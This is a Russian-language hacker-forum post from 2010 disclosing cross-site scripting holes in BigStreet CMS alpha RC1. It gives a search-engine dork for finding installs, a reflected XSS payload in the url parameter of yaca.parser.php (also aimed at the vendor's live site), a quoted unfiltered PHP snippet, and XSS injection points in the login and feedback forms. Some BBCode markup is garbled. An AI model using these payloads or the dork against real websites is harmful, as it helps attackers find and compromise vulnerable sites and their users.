16.07.2010, 13:47
|
|
Участник форума
Регистрация: 20.01.2008
Сообщений: 284
С нами:
9634796
Репутация:
408
|
|
BigStreet alpha RC1
(07.10.2010)
BigStreet CMS — система для создания сообществ.
Искать в гугле по запросу
Код:
Powered by BigStreet
XSS
Передаём в GET
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//site/system/tools/yaca.parser.php?url=1alert(1).[/COLOR][/COLOR]
Сайт автора:
Сообщение от None
http://www.bigstreet.ru/system/tools/yaca.parser.php?url=1%3Cscript%3Ealert%281%29%3C/script%3E.
Недостаточная фильтрация входящих данных.
PHP код:
[COLOR="#000000"][/COLOR]" style="width: 500px">
$text = file_get_contents($first_url);
$text = iconv('windows-1251', 'utf-8', $text);
preg_match_all("/\d+/isU", $text, $matches);
$text = file_get_contents($url);
$text = iconv('windows-1251', 'utf-8', $text);
preg_match_all("/([\d\w\.\-]*)/isU", $text, $matches);
[/COLOR]
XSS passive:
При вводе логина пароля
Сообщение от None
1alert(407747180852).
Страница http://site/feedback/
Уязвимо поле: Спросите, пожелайте, возмутитесь
Отправляем пост запрос с таким содержимым
alert()
|
|
|